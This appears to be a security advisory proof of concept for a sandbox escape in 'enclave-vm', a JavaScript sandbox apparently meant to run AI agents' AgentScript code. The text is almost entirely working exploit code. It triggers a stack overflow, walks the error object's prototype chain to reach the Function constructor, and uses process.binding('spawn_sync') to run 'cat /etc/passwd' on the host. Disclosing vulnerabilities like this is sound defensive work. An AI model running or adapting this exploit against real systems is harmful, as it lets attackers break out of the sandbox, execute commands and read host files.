GHSA-x39w-8vm5-5m3p

import { Enclave } from 'enclave-vm'; // Create enclave with a tool handler const enclave = new Enclave({ timeout: 5000, maxToolCalls: 10, maxIterations: 1000, toolHandler: async (toolName, args) => { // Your tool execution logic return { success: true, data: `Called ${toolName}` }; }, }); // Execute AgentScript code const result = await enclave.run(` let res = null, rootProt = null; let a = () =>{ try { a(); } catch (e) { rootProt = e[["__proto__"]][["__proto__"]][["__proto__"]]; res=e.stack } } a(); rootProt[["foo"]] = rootProt[["toString"]][["constructor"]] rootProt[["foo"]]("let options = {file: 'cat', args: [null,'/etc/passwd'], envPairs: [], stdio: [{ type: 'pipe', readable: true, writable: false },{ type: 'pipe', readable: false, writable: true },{ type: 'pipe', readable: false, writable: true } ]}; console.log(process.binding('spawn_sync').spawn(options).output[1].toString())")(); `);